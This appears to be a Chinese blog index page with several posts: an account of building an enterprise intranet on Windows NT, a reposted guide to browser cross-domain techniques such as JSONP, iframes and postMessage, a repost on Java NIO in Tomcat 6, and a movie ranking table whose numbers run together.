作为一名单位内信息中心的技术骨干,我有幸独立完成了整体方案设计、组织参与了本单位的Intranet的建设并承担了部分软件的开发工作。该方案实施后,集成了原有的业务应用系统,建立了企业内部信息发布系统和FTP文件传输系统,并与下属单位实现了网络互连,实现了相互间信息共享,并利用VPN技术利用 INTERNET网能访问总公司的Intranet。 现将实施这一工程的一些方法和策略以及我们采用的一些措施介绍如下,希望能对组建中小企业Intranet网有所启发:

基本情况:1、应用单位情况:某外运集团在某口岸外贸运输企业,是一家经贸部属企业,是集团的分布各地的一个分支机构,承担进出口货物的运输代理,以进出口货物的单据流转为主配合物流为客户服务作为主业务。
2、计算机应用情况:现企业有一局城网,NT 4.0平台,运行的核心应用软件为集装箱运输代理业务系统,为VISUAL FOXPRO 5.0开发的网络多用户系统。还有其它一些人事、财务、统计软件、办公软件(OFFICE)在使用。有专门的计算机应用机构4人。

本单位Intranet网的实施主要是针对系统内信息流转不畅的需求而得以进行的。在实施方案的过程中我们主要进行了如下的策略选择:
1、网络建设方案:单位原有一局城网,25个信息息点。但随着信息化建设的高要求,已远远不能满足需要。单位有6层办公楼,要求人手一机,同时要求与三个基层单位(车队、外运仓库)和一个集装箱站相连。领导层、中层干部等都要求有相应数据和各种查询。对于本单位情况,首先在办公楼进行了综合布线工程,由于办公楼不大,集用了集中走线的方案,采用5类线,100M带宽,125个信息点。交换机采用12口3COM 3C5092A 10/100M自适应设备,共享HUB采用数个3COM 16口HUB。并选用CISCO 3600作为路由器,4个广域网口连接4 个远程基层单位和箱站,采用拨号方式.并将来打算用帧中继FR与北京总部相连(因为经费,暂时没有申请)。由于单位多为PC机,有庞大的WINDOWS用户群,故网络平台也采用WINDOWS NT4.0.采用Intranet的基础协议TCP/IP作为网络协议。
另外对于办公楼较大的可采用采用结构化布线,大对数电缆做主干,设主工作间、每层设水平工作间的方案进行。若有好几个楼群如校园网,可采用光纤做主干网(FDDI),再在每个楼实行P&S布线。
2、 软件平台的选择:当前流行的Intranet平台,有A、基于UNIX,B、基于LINUX(开放源代码的OS) C、基于微软平台WINDOWS NT。考虑到中小企业的特点、可供选择的第三方软件比较多、支持微软平台的软件厂商多以及方便用户简便易操作、GUI界面等因素,我们选择了 windows nt4.0作为网络操作系统,用自身配备的IIS4.0作为WEB平台,IE4.0作为客户Intranet网上浏览平台. 相比于SYBASE、ORCALE、INFORMIX、DB2等大型数据库由于SQL SERVER是与NT平台具与极佳的配合性能的小大型数据库,对中小型企业较为合适,自然就选择SQL SERVER6.0作为数据库平台. 另外,用LINUX平台技术当前也十分红火,从技术上讲也是完全可以胜任的,只是考虑到学习上的要一断时间,以及用户的接受能力故未采用。
3.由于我们自已的技术力量较强,并且面对外运行业的商品化软件较少.我们打算自已开发INTRANET上一些WEB应用软件.开发平台用VISUAL BASIC/FRONT PAGE/Html editor,由于还要开发一些交互式WEB应用程序,还要采集原应用系统的数据。需要掌握相应用交互式开发技术和与数据库相连的技术,如CGI(公共网关接口)、API(应用程序编程接口)、ASP(活动服务器页)、ODBC(开放数据库互连)、RDO/ADO(ACTIVEX DATA OBJECT活动数据对象)。在上述技术中,考虑到响应速度和效率,我建议采用ASP加ADO的技术进行开发。并且这是当前和将来的 INTERNET/Intranet网主流开发技术。
4、内网与外网的互通以及安全考虑:由于属中小企业,单位上英特网的并发用户数一般不会超过15人,我们采用了较为低廉的ISDN一线通方式,专用一台 PC用安装了代理服务器软件(PROXY),可实现按需拨号、HTTP代理、FTP代理、TELNET代理、SMTP/POP
邮件代理、用户管理等,可设快速缓冲。当然,用DDN方式,申请合法的IP地址再设代理的方式也可行,只是由于经费的原因,没有选择。由于内外网的互通,如果没有一定的安全机制,将使公司的内部数据、机器、应用系统受病毒或黑客的攻击或非授权访问等。
内外网间的安全技术有包过滤、防火墙、安全代理服务等,由于我们选择的代理服务器软件已有部分安全方面的机制并且内部数据的安全措施、管理制度、备份机制做的还可以。故没有在这方面投入更多的资金。在内部局域网上,我们选择了NET VRV(50用户)网络版防病毒软件,在服务器端和客户端都各自安装相应的版本,保证了内网的安全可靠性。当前,做网络安全的公司很多,如王江民的KV系列、瑞星公司等都可选择。
5、原有的应有系统与Intranet技术的集成:由于原应用系统是基于FOXPRO,数据库为文件型数据库,所选的WEB应用开发环境并不能直接操作 FOXPRO数据库。对此我们有另外编制了一个软件用于每天从应用系统中将管理者与领导层要的数据导入SQL SERVER中,再以SQL SERVR为后台,编制WEB交互查询系统。
6、与集团总部的相连:现在WIONDOWSNT4.0支持一种新技术即VPN(虚拟专用网),对于实时性要求不高又受经费困扰的应用来说,无疑是一种较为可行的方案,由于总部的条件较好,已建设好INTRANET网,并通过路由器以DDN与INTERNET直通.分公司在目前条件下,与总公司的连接是暂通过INERNET网,并在此链路基础上,运行PPTP协议(而非PPP协议),虚拟出一个数据通道,并在此基础上,通过用户身份验证即可实现总公司 Intranet与分公司LAN的连接.现在的应用有,分公司的LAN用户可直接浏览总公司的Intranet网的WEB站点.同时,全系统的业务统计软件也是改为通过WEB应用程序实现的。
Intranet网运行后,在公司的用户间获得好评,客户界面(IE)的单一化,简化用户培训学习的过程.同时,网络的建成,极大方便了系统内信息和单据的流转速度,文件、数据的上传、下载十分方便.原有的应用系统数据还可通过IE浏览查询.部分WEB应用程序的建立,使客户端的维护成本大大降低.同时 Intranet的成功运行,也使得我们的信息部门的地位有所提高。
但是,由于单位性质、规模的许多局限性,诸如费用、本身的技术水平、系统分析能力等,使一些应用走了简单、实用、低廉的策略。我们仅做了一台WEB服务器、一台SQLSERVER服务器和一台主域NT服务器,由于机器较少,没有作域名分配;对于与原文件型数据库的应用系统,没有采用效率更好的方法,做了简单化处理;与总公司总部的相连,速度稍难忍受、高峰堵塞严重,一般使用都各分公司划时间段使用;另外,在说服领导花钱投入加以重视方面还有待改进;也许,采用与软件公司、ISP等专业公司合作开发会更好地把本企业Intranet网做好。

鉴于上述原因,我认为我们公司的Intranet网将来还要作如下方面的改进:
1、通信线路的改进:随着各种数据通讯网的建立和改善以及费用的逐步下降,分公司与总公司、分公司与基单位将来都应该采用DDN/FR甚至光缆等专线接入。
2、软件应用模式从DOS单用户、文件型数据库多用户、C/S、向B/S结构、三层结构和多层次结方向方向发展,我们单位,将来的应用升级可直接使用B /S结构、三层结构,在开发技术中要广泛使用面向对象OOP、COM/DCOM构件组件、ADO数据库连接对象、ASP技术。并且开发方式也要采取与专业技术软件公司进行合作或委托开发的形式,否则,自已开发的软件的质量、可靠性等方面都难以达到软件工程的高要求;另外,更要在开发中重需求分析、重建模(可采用UML建模技术)、加强项目管理、团队协作。
3、在1-2年内,用专线接入INTERNET网,建立基于INTERNET网的客户查询系统,在内外网间设立防火墙。

-------------------------------------------------------------------------------------------------------------


Continue reading 【参考】设计企业信息系统的安全体系

【转】疯狂的跨域技术

转了http://blog.csdn.net/raychase/archive/2011/01/09/6125652.aspx

嵌套转:
原帖地址:http://itgeeker.com/mathml/readpaper?pid=53

JavaScript 是一种在Web开发中经常使用的前端动态脚本技术。在JavaScript中,有一个很重要的安全性限制,被称为“Same-Origin Policy”(同源策略)。这一策略对于JavaScript代码能够访问的页面内容做了很重要的限制,即JavaScript只能访问与包含它的文档在同一域下的内容。

JavaScript这个安全策略在进行多iframe或多窗口编程、以及Ajax编程时显得尤为重要。根据这个策略,在baidu.com下的页面中包含的JavaScript代码,不能访问在google.com域名下的页面内容;甚至不同的子域名之间的页面也不能通过JavaScript代码互相访问。对于Ajax的影响在于,通过XMLHttpRequest实现的Ajax请求,不能向不同的域提交请求,例如,在abc.example.com下的页面,不能向def.example.com提交Ajax请求,等等。

然而,当进行一些比较深入的前端编程的时候,不可避免地需要进行跨域操作,这时候“同源策略”就显得过于苛刻。本文就这个问题,概括了跨域所需要的一些技术。

下面我们分两种情况讨论跨域技术:首先讨论不同子域的跨域技术,然后讨论完全不同域的跨域技术。

(一)不同子域的跨域技术。

我们分两个问题来分别讨论:第一个问题是如何跨不同子域进行JavaScript调用;第二个问题是如何向不同子域提交Ajax请求。

先来解决第一个问题,假设example.com域下有两个不同子域:abc.example.com和def.example.com。现在假设在def.example.com下面有一个页面,里面定义了一个JavaScript函数:

function funcInDef() {

.....

}

我们想在abc.example.com下的某个页面里调用上面的函数。再假设我们要讨论的abc.example.com下面的这个页面是以iframe形式嵌入在def.example.com下面那个页面里的,这样我们可能试图在iframe里做如下调用:

window.top.funcInDef();

好,我们注意到,这个调用是被前面讲到的“同源策略”所禁止的,JavaScript引擎会直接抛出一个异常。

为了实现上述调用,我们可以通过修改两个页面的domain属性的方法做到。例如,我们可以将上面在abc.example.com和def.example.com下的两个页面的顶端都加上如下的JavaScript代码片段:

<script type="text/javascript">

document.domain = "example.com";

</script>

这样,两个页面就变为同域了,前面的调用也可以正常执行了。

我试过,在www.abc.com中请求abc.com/action就算跨域(前面没有带www),即使采用上面的方法仍然行不通。

这里需要注意的一点是,一个页面的document.domain属性只能设置成一个更顶级的域名(除了一级域名),但不能设置成比当前域名更深层的子域名。例如,abc.example.com的页面只能将它的domain设置成example.com,不能设置成 sub.abc.example.com,当然也不能设置成一级域名com。

上面的例子讨论的是两个页面属于iframe嵌套关系的情况,当两个页面是打开与被打开的关系时,原理也完全一样。

下面我们来解决第二个问题:如何向不同子域提交Ajax请求。

通常情况下,我们会用与下面类似的代码来创建一个XMLHttpRequest对象:

factories = [

function() { return new XMLHttpRequest(); },

function() { return new ActiveXObject("Msxml2.XMLHTTP"); },

function() { return new ActiveXObject("Microsoft.XMLHTTP"); }

];

function newRequest() {

for(var i = 0; i < factories.length; i++) {

try{

var factory = factories[i];

return factory();

} catch(e) {}

}

return null;

}

上面的代码中引用ActiveXObject,是为了兼容IE6系列浏览器。每次我们调用newRequest函数,就获得了一个刚刚创建的Ajax对象,然后用这个Ajax对象来发送HTTP请求。例如,下面的代码向abc.example.com发送了一个GET请求:

var request = newRequest();

request.open("GET", "http://abc.example.com" );

request.send(null);

假设上面的代码包含在一个abc.example.com域名下的页面里,则这个GET请求可以正常发送成功,没有任何问题。然而,如果现在要向def.example.com发送请求,则出现跨域问题,JavaScript引擎抛出异常。

解决的办法是,在def.example.com域下放置一个跨域文件,假设叫crossdomain.html;然后将前面的newRequest函数的定义移到这个跨域文件中;最后像之前修改document.domain值的做法一样,在crossdomain.html文件和 abc.example.com域下调用Ajax的页面顶端,都加上:

<script type="text/javascript">

document.domain = "example.com";

</script>

为了使用跨域文件,我们在abc.example.com域下调用Ajax的页面中嵌入一个隐藏的指向跨域文件的iframe,例如:

<iframe name="xd_iframe" style="display:none" src="http://def.example.com/crossdomain.html"></iframe>

这时abc.example.com域下的页面和跨域文件crossdomain.html都在同一个域(example.com)下,我们可以在abc.example.com域下的页面中去调用crossdomain.html中的newRequest函数:

var request = window.frames["xd_iframe"].newRequest();

这样获得的request对象,就可以向http://def.example.com发送HTTP请求了。

(二)完全不同域的跨域技术。

如果顶级域名都不相同,例如example1.com和example2.com之间想通过JavaScript在前端通信,则所需要的技术更复杂些。

在讲解不同域的跨域技术之前,我们首先明确一点,下面要讲的技术也同样适用于前面跨不同子域的情况,因为跨不同子域只是跨域问题的一个特例。当然,在恰当的情况下使用恰当的技术,能够保证更优的效率和更高的稳定性。

简言之,根据不同的跨域需求,跨域技术可以归为下面几类:

  1. JSONP跨域GET请求
  2. 通过iframe实现跨域
  3. flash跨域HTTP请求
  4. window.postMessage

下面详细介绍各种技术。

1. JSONP。

利用在页面中创建<script>节点的方法向不同域提交HTTP请求的方法称为JSONP,这项技术可以解决跨域提交Ajax请求的问题。JSONP的工作原理如下所述:

假设在http://example1.com/index.php这个页面中向http://example2.com/getinfo.php提交 GET请求,我们可以将下面的JavaScript代码放在http://example1.com/index.php这个页面中来实现:

var eleScript= document.createElement("script");

eleScript.type = "text/javascript";

eleScript.src = "http://example2.com/getinfo.php";

document.getElementsByTagName("HEAD")[0].appendChild(eleScript);

当GET请求从http://example2.com/getinfo.php返回时,可以返回一段JavaScript代码,这段代码会自动执行,可以用来负责调用http://example1.com/index.php页面中的一个callback函数。

JSONP 的优点是:它不像XMLHttpRequest对象实现的Ajax请求那样受到同源策略的限制;它的兼容性更好,在更加古老的浏览器中都可以运行,不需要 XMLHttpRequest或ActiveX的支持;并且在请求完毕后可以通过调用callback的方式回传结果。

JSONP的缺点则是:它只支持GET请求而不支持POST等其它类型的HTTP请求;它只支持跨域HTTP请求这种情况,不能解决不同域的两个页面之间如何进行JavaScript调用的问题。

2. 通过iframe实现跨域。

iframe跨域的方式,功能强于JSONP,它不仅能用来跨域完成HTTP请求,还能在前端跨域实现JavaScript调用。因此,完全不同域的跨域问题,通常采用iframe的方式来解决。

与 JSONP技术通过创建<script>节点向不同的域提交GET请求的工作方式类似,我们也可以通过在 http://example1.com/index.php页面中创建指向http://example2.com/getinfo.php的 iframe节点跨域提交GET请求。然而,请求返回的结果无法回调http://example1.com/index.php页面中的 callback函数,因为受到“同源策略”的影响。

为了解决这个问题,我们需要在example1.com下放置一个跨域文件,比如路径是http://example1.com/crossdomain.html。

当http://example2.com/getinfo.php这个请求返回结果的时候,它大体上有两个选择。

第一个选择是,它可以在iframe中做一个302跳转,跳转到跨域文件http://example1.com/crossdomain.html,同时将返回结果经过URL编码之后作为参数缀在跨域文件URL后面,例如http://example1.com /crossdomain.html?result=<URL-Encoding-Content>。

另一个选择是,它可以在返回的页面中再嵌入一个iframe,指向跨域文件,同时也是将返回结果经过URL编码之后作为参数缀在跨域文件URL后面。

在跨域文件中,包含一段JavaScript代码,这段代码完成的功能,是从URL中提取结果参数,经过一定处理后调用原来的 http://example1.com/index.php页面中的一个预先约定好的callback函数,同时将结果参数传给这个函数。http: //example1.com/index.php页面和跨域文件是在同一个域下的,因此这个函数调用可以通过。跨域文件所在iframe和原来的 http://example1.com/index.php页面的关系,在前述第一种选择下,后者是前者的父窗口,在第二种选择下,后者是前者的父窗口的父窗口。

根据前面的叙述,有了跨域文件之后,我们就可以实现通过iframe方式在不同域之间进行JavaScript调用。这个调用过程可以完全跟HTTP请求无关,例如有些站点可以支持动态地调整在页面中嵌入的第三方iframe的高度,这其实是通过在第三方iframe里面检测自己页面的高度变化,然后通过跨域方式的函数调用将这个变化告知父窗口来完成的。

既然利用iframe可以实现跨域 JavaScript调用,那么跨域提交POST请求等其它类型的HTTP请求就不是难事。例如我们可以跨域调用目标域的JavaScript代码在目标域下提交Ajax请求(GET/POST/etc.),然后将返回的结果再跨域传原来的域。

使用iframe跨域,优点是功能强大,支持各种浏览器,几乎可以完成任何跨域想做的事情;缺点是实现复杂,要处理很多浏览器兼容问题,并且传输的数据不宜过大,过大了可能会超过浏览器对URL长度的限制,要考虑对数据进行分段传输等。

3. 利用flash实现跨域HTTP请求

据称,flash在浏览器中的普及率高达90%以上。

flash代码和JavaScript代码之间可以互相调用,并且flash的“安全沙箱”机制与JavaScript的安全机制并不尽相同,因此,我们可以利用flash来实现跨域提交HTTP请求(支持GET/POST等)。

例如,我们用浏览器访问http://example1.com/index.php这个页面,在这个页面中引用了http://example2.com /flash.swf这个flash文件,然后在flash代码中向http://example3.com/webservice.php发送HTTP 请求。

这个请求能否被成功发送,取决于在example3.com的根路径下是否放置了一个crossdomain.xml以及这个 crossdomain.xml的配置如何。flash的“安全沙箱”会保证:仅当example3.com服务器在根路径下确实放置了 crossdomain.xml文件并且在这个文件中配置了允许接受来自example2.com的flash的请求时,这个请求才能真正成功。下面是一个crossdomain.xml文件内容的例子:

<?xml version="1.0"?>

<cross-domain-policy>

<allow-access-from domain="example2.com" />

</cross-domain-policy>

4. window.postMessage

window.postMessage是HTML标准的下一个版本HTML5支持的一个新特性。受当前互联网技术突飞猛进的影响,浏览器跨域通信的需求越来越强烈,HTML标准终于把跨域通信考虑进去了。但目前HTML5仍然只是一个draft。

window.postMessage是一个安全的实现直接跨域通信的方法。但是目前并不是所有浏览器都能支持,只有Firefox 3、Safari 4和IE8可以支持这个调用。

使用它向其它窗口发送消息的调用方式大概如下:

otherWindow.postMessage(message, targetOrigin);

在接收的窗口,需要设置一个事件处理函数来接收发过来的消息:

window.addEventListener("message", receiveMessage, false);function receiveMessage(event){ if (event.origin!== "http://example.org:8080") return;}消息包含三个属性:data、origin(携带发送窗口所在域的真实信息)和source(代表发送窗口的handle)。

安全性考虑:使用window.postMessage,必需要使用消息的origin和source属性来验证发送者的身份,否则会造成XSS漏洞。

window.postMessage在功能上同iframe实现的跨域功能同样强大,并且使用简单,效率更高,但缺点是它目前在浏览器兼容方面有待提高。

总结完所有的跨域方式之后,我们要时刻铭记,虽然跨域技术能给你带来更多的功能,催生出更灵活和更加平台化的产品,但是功能的放开也总是意味着安全的风险。在实现跨域技术的每个步骤和细节,都要时刻在头脑中考虑到对安全带来的影响,避免成为XSS攻击的漏洞。

 

俺在转载基础上,再补充两个实现:

1、百度在Ajax跨域的时候用了这样的办法:往head里面加一个script src=xxx,因为script标签是可以跨域的。
2、Google的点击计数则这样做:new img().src=...;也跨域了。。。

 

Continue reading 【转】疯狂的跨域技术

【转】java nio与tomcat 6 中nio的使用

转自http://jiangyongyuan.iteye.com/blog/361983

 

很早就听说tomcat6使用nio了,这几天突然想到一个问题,使用nio代替传统的bioThreadLocal岂不是会存在冲突? 
 
首先,何谓nio 
 
如果读者有socket的编程基础,应该会接触过堵塞socket和非堵塞socket,堵塞socket就是在acceptreadwrite IO操作的的时候,如果没有可用符合条件的资源,不马上返回,一直等待直到有资源为止。而非堵塞socket则是在执行select的时候,当没有资源的时候堵塞,当有符合资源的时候,返回一个信号,然后程序就可以执行acceptreadwrite等操作,这个时候,这些操作是马上完成,并且马上返回。而windowswinsock则有所不同,可以绑定到一个EventHandle里,也可以绑定到一个HWND里,当有资源到达时,发出事件,这时执行的io操作也是马上完成、马上返回的。一般来说,如果使用堵塞socket,通常我们时开一个线程accept socket,当有socket链接的时候,开一个单独的线程处理这个socket;如果使用非堵塞socket,通常是只有一个线程,一开始是 select状态,当有信号的时候马上处理,然后继续select状态。
 
按照大多数人的说法,堵塞socket比非堵塞 socket的性能要好。不过也有小部分人并不是这样认为的,例如Indy项目(Delphi一个比较出色的网络包),它就是使用多线程+堵塞 socket模式的。另外,堵塞socket比非堵塞socket容易理解,符合一般人的思维,编程相对比较容易。 
 
nio其实也是类似上面的情况。在JDK1.4sun公司大范围提升Java的性能,其中NIO就是其中一项。JavaIO操作集中在java.io这个包中,是基于流的阻塞API(即BIOBlock IO)。对于大多数应用来说,这样的API使用很方便,然而,一些对性能要求较高的应用,尤其是服务端应用,往往需要一个更为有效的方式来处理IO。从 JDK 1.4起,NIO API作为一个基于缓冲区,并能提供非阻塞O操作的API(即NIOnon-blocking IO)被引入。 
 
BIONIO一个比较重要的不同,是我们使用BIO的时候往往会引入多线程,每个连接一个单独的线程;而NIO则是使用单线程或者只使用少量的多线程,每个连接共用一个线程。  
 

clip_image001

 

这个时候,问题就出来了:我们非常多的java应用是使用ThreadLocal的,例如JSFFaceContextHibernate session管理、Struts2Context的管理等等,几乎所有框架都或多或少地应用ThreadLocal。如果存在冲突,那岂不惊天动地? 
 
后来终于在Tomcat6的文档(http://tomcat.apache.org/tomcat-6.0-doc/aio.html)找到答案。根据上面说明,应该Tomcat6应用nio只是用在处理发送、接收信息的时候用到,也就是说,tomcat6还是传统的多线程Servlet,我画了下面两个图来列出区别: 
 
tomcat5:客户端连接到达 -> 传统的SeverSocket.accept接收连接 -> 从线程池取出一个线程 -> 在该线程读取文本并且解析HTTP协议 -> 在该线程生成ServletRequestServletResponse,取出请求的Servlet -> 在该线程执行这个Servlet -> 在该线程把ServletResponse的内容发送到客户端连接 -> 关闭连接。 
 
我以前理解的使用nio后的tomcat6:客户端连接到达 -> nio接收连接 -> nio使用轮询方式读取文本并且解析HTTP协议(单线程) -> 生成ServletRequestServletResponse,取出请求的Servlet -> 直接在本线程执行这个Servlet -> ServletResponse的内容发送到客户端连接 -> 关闭连接。 
 
实际的tomcat6:客户端连接到达 -> nio接收连接 -> nio使用轮询方式读取文本并且解析HTTP协议(单线程) -> 生成ServletRequestServletResponse,取出请求的Servlet -> 从线程池取出线程,并在该线程执行这个Servlet -> ServletResponse的内容发送到客户端连接 -> 关闭连接。  
 
 
从上图可以看出[图在哪里?作者也是转的?]BIONIO的不同,也导致进入客户端处理线程的时刻有所不同:tomcat5在接受连接后马上进入客户端线程,在客户端线程里解析HTTP协议,而tomcat6则是解析完HTTP协议后才进入多线程,另外,tomcat6也比5早脱离客户端线程的环境。 
 
实际的tomcat6与我之前猜想的差别主要集中在如何处理servlet的问题上。实际上即使抛开 ThreadLocal的问题,我之前理解tomcat6只使用一个线程处理的想法其实是行不同的。大家都有经验:servlet是基于BIO的,执行期间会存在堵塞的,例如读取文件、数据库操作等等。tomcat6使用了nio,但不可能要求servlet里面要使用nio,而一旦存在堵塞,效率自然会锐降。

Continue reading 【转】java nio与tomcat 6 中nio的使用

巨牛电影榜

榜位名称观看人数评分
1The Shawshank Redemption28043495
2Forrest Gump25439593
3Léon25396894
4Titanic21980488
5La leggenda del pianista sull'oceano21718992
6Le fabuleux destin d'Amélie Poulain19149489
7Edward Scissorhands18004187
8Roman Holiday14891889
9Love Letter14269888
10Braveheart12681688
11Jeux d'enfants12536585
12The Butterfly Effect12296386
13The Truman Show12200688
14Fight Club12046291
15La vita è bella12021994
16无间道11871387
17The Silence of the Lambs11431286
18西游记大结局之仙履奇缘11305489
19Love Actually11117386
20The Lion King10794287
21重庆森林10398586
22ハウルの動く城10180586
23Scent of a Woman10155988
24西游记第一百零一回之月光宝盒10075288
25Trainspotting9983686
26東邪西毒9884085
27Malèna9833185
28Gone with the Wind9758892
29A Beautiful Mind9338688
30The Sound of Music9150689
31射雕英雄传之东成西就8954887
32甜蜜蜜8508886
33Memento8227185
34もののけ姫8225687
35Saving Private Ryan7709086
36The Notebook7708985
37Lock, Stock and Two Smoking Barrels7624291
38火垂るの墓7588589
39Good Will Hunting7546886
40The Sixth Sense7207987
41活着7166288
42春光乍洩6893186
43The Pianist6393089
44Artificial Intelligence: AI6355986
45Legends of the Fall6075088
46Mulholland Dr.5835786
47Sin City5792185
48Before Sunset5745187
49E.T. the Extra-Terrestrial5674785
50Waterloo Bridge5607287
51The Godfather: Part II5562190
52Before Sunrise5535288
53スワロウテイル5327387
54麦兜故事5259285
55Eternal Sunshine of the Spotless Mind5238485
56菊次郎の夏5143788
57Once Upon a Time in America5117790
58可可西里5078785
59Le grand bleu5057288
60Hilary and Jackie4984185
61一一4792689
62Casablanca4597086
63耳をすませば4473687
64Le papillon4068086
65緃横四海3982986
66英雄本色3976986
67La grande vadrouille3926190
68The Godfather: Part III3909087
69بچههای آسمان3900891
70Sissi3751086
71Pride and Prejudice3703290
72The Green Mile3634786
73PicNic3617485
74买凶拍人3477086
75Taxi Driver3229185
76Snatch3203185
77喜宴3201885
78The Usual Suspects3139386
79牯嶺街少年殺人事件3102887
80The Gods Must Be Crazy3038287
81Central do Brasil3022987
82Singin' in the Rain3015889
83哪吒闹海2860687
84Amadeus2831987
85Father and Daughter2799892
86살인의 추억2728086
87Good Bye Lenin!2676387
8812 Angry Men2633693
89Hable con ella2611486
90Band of Brothers2571793
91Gloomy Sunday - Ein Lied von Liebe und Tod2548887
92Thelma & Louise2530285
93Requiem for a Dream2466488
94Trois couleurs: Rouge2404187
95L.A. Confidential2368485
96Dances with Wolves2322688
97Philadelphia2305385
98Le peuple migrateur2293890
99Sex and the City2283187
100I Am Sam2251988
101Trois couleurs: Blanc2205685
102American History X2108886
103Billy Elliot2095287
104盲井1992585
105七人の侍1968591
106Pink Floyd The Wall1903188
107Pink Floyd The Wall1902988
108Velvet Goldmine1865485
109Modern Times1802391
110What's Eating Gilbert Grape1758187
111The Animatrix1748687
112Psycho1639988
113봄 여름 가을 겨울 그리고 봄1635385
114Les quatre cents coups1600688
115Dogville1552286
116South Park: Bigger Longer & Uncut1550985
117The Godfather Trilogy: 1901-1980 (V)1543295
118Sissi - Die junge Kaiserin1497185
119A Perfect World1468490
120The Gods Must Be Crazy II1444188
121HANA-BI1431785
122Bicentennial Man1419885
123暗恋桃花源1419387
124悲情城市1384786
125Gattaca1319286
126Ladri di biciclette1281788
127Der Himmel über Berlin1262685
1281229586
129Sissi - Schicksalsjahre einer Kaiserin1215685
130CSI: Crime Scene Investigation1188990
131K-PAX1184485
132241128086
133John Q1109285
134Melody1102587
135Vampire Hunter D: Bloodlust1091987
136Microcosmos: Le peuple de l'herbe1042290
137Mr. Bean1019990
138藍色大門11891984
139엽기적인 그녀11171579
140Pirates of the Caribbean: The Curse of the Black Pearl10451984
141Mr. & Mrs. Smith10312973
142唐伯虎点秋香9593781
143Corpse Bride9308780
144Charlie and the Chocolate Factory9118977
145喜剧之王8684980
146The Day After Tomorrow8670879
147Notting Hill8463479
148Home Alone8201479
149The Princess Diaries8233474
150Face/Off8079183
151The Terminal7903184
152King Kong7895977
153클래식7790082
15450 First Dates7816578
155リリイ·シュシュのすべて7695681
156Interview with the Vampire: The Vampire Chronicles7553383
157Sleepless in Seattle7568979
158Lola rennt7395582
159Identity7305284
160花とアリス7337881
161青蛇7112681
162City of Angels7065480
163独自等待7064379
164Pirates of the Caribbean: Dead Man's Chest7034279
165食神7002975
166Harry Potter and the Sorcerer's Stone6866381
167魔女の宅急便6804083
168Ghost6785681
169Spider-Man6883072
170American Beauty6683182
171A Clockwork Orange6618084
172Pearl Harbor6704075
173The Mask6464677
174四月物語6311781
175I, Robot6077378
176The Graduate6016879
177The Fifth Element5987978
178Final Destination5944977
179Madagascar5930176
180Harry Potter and the Chamber of Secrets5911277
181Mulan5937873
182新龍門客棧5815482
183Bridget Jones's Diary5866575
184내 머리 속의 지우개5810079
185V for Vendetta5684284
186九品芝麻官5712579
187Closer5681677
188Harry Potter and the Goblet of Fire5591277
189The Parent Trap5535582
190The Rock5422684
191Men in Black5434779
192手机5473772
193Gladiator5324583
194National Treasure5411875
195バトル・ロワイアル5341681
196Jurassic Park5361279
197新警察故事5419870
198Independence Day5264680
199倩女幽魂5249281
200The Matrix Reloaded5245881
201Independence Day5256780
202Con Air5235980
203臥虎藏龍5245173
204国产凌凌漆5184978
205Garfield5205375
206True Lies5085080
207大腕5126676
208The Bourne Identity5012984
209The Matrix Revolutions4995982
210阿飛正傳4972284
211鹿鼎記5047077
212クイール4954683
213胭脂扣4969781
214The Mummy5023176
215Neko no ongaeshi4962278
216武状元苏乞儿5018771
217甲方乙方4887481
218Bruce Almighty4950273
219Stuart Little4914173
220Dracula4808578
221蓝宇4801677
222无间道Ⅱ4737378
223Legally Blonde4790972
224Chocolat4554780
225Hitch4591675
226Mission: Impossible4538977
227Catch Me If You Can4441383
228Troy4503572
229The Bourne Supremacy4299884
230一个陌生女人的来信4396174
231无间道Ⅲ终极无间4382375
232Pretty Woman4322579
233The Others4248579
234Entrapment4261676
235Sleepy Hollow4227677
236逃學威龍4218972
237색즉시공4218372
238暗战4103382
239You've Got Mail4162976
240Moulin Rouge!4110779
241Ocean's Eleven4105078
242Cast Away4036283
243Sister Act4065080
244The Terminator4079778
245The Nightmare Before Christmas4023683
246Phone Booth4049579
247一个都不能少4117872
248X-Men4088874
249孔雀4038977
250Enemy at the Gates3957383
251101 Dalmatians4052973
252Tais-toi!3974279
253Chicken Run4007074
254The Mummy Returns3998473
255Final Destination 23995373
256不见不散3937177
257星願4009470
258The Sisterhood of the Traveling Pants3887676
259Fanfan3795481
260Constantine3847676
261Enemy of the State3804679
262빈집3773680
263Speed3783379
264Cube3760880
265The Piano3699381
266鹿鼎记II神龙教3753275
267苏州河3725376
268Twelve Monkeys3691079
269Cold Mountain3690778
270Jumanji3685378
271Tarzan3728374
272My Best Friend's Wedding3725374
273Natural Born Killers3614683
274Million Dollar Baby3561882
275The Bridges of Madison County3508784
276Men in Black II3590673
277The Last Emperor3459284
278Lolita3463178
279大红灯笼高高挂3425380
280올드보이3355084
281Beauty and the Beast3382781
282Saw II3395279
283Four Weddings and a Funeral3436375
284Reservoir Dogs3352482
285X23415574
286Shaun of the Dead3318679
287Resident Evil3325476
288The Italian Job3328675
289The Italian Job3328175
290我的父亲母亲3287676
291A Walk in the Clouds3245678
292有话好好说3244477
293Elephant3221879
294Banlieue 133207480
295American Pie3249673
296Kate & Leopold3209074
297Shakespeare in Love3203173
298心動3070881
299整蛊专家3130670
300红高粱2991181
301笑傲江湖Ⅱ东方不败3012179
302審死官3095771
303新扎师妹3045175
304呪怨3043373
305Bridget Jones: The Edge of Reason3037973
306リング2995575
307Minority Report2962175
308Heat2832984
309The Bodyguard2898078
310The Hours2826484
311方世玉2873276
312Air Force One2887174
313Hannibal2799980
314Un long dimanche de fiançailles2801179
315Ocean's Twelve2889970
31620 30 402864772
317Resident Evil: Apocalypse2827475
318我是谁2855771
319Underworld2821774
320Matchstick Men2720481
321Freaky Friday2798373
322The Lost World: Jurassic Park2756875
323賭聖2792071
324Home Alone 2: Lost in New York2721976
325玻璃之城2685679
326美少年之恋2749773
327平成狸合戦ぽんぽこ2641782
328Geri's Game2609484
329Serendipity2684876
330Van Helsing2705670
331시월애2564179
332家有喜事2537178
333枪火2470184
334The Transporter2608471
335世界の中心で、愛をさけぶ2515276
336The Devil's Advocate2443681
337Batman Begins2476278
338异度空间2526273
339蝴蝶2479376
340Starship Troopers2491374
341千年女優2369484
342黃飛鴻之三獅王爭霸2441576
343Alien2429177
344没完没了2471073
345The Machinist2392176
346夜半歌声2358878
347Liar Liar2375175
348A River Runs Through It2278483
349The Game2324578
350The Game2321478
351开往春天的地铁2401570
352The Hitchhiker's Guide to the Galaxy2270081
353Chicago2253582
354寻枪2304475
355忘不了2291576
35621 Grams2240780
357太極張三豐2319272
358黃飛鴻2262077
359Finding Neverland2226078
360Sense and Sensibility2180181
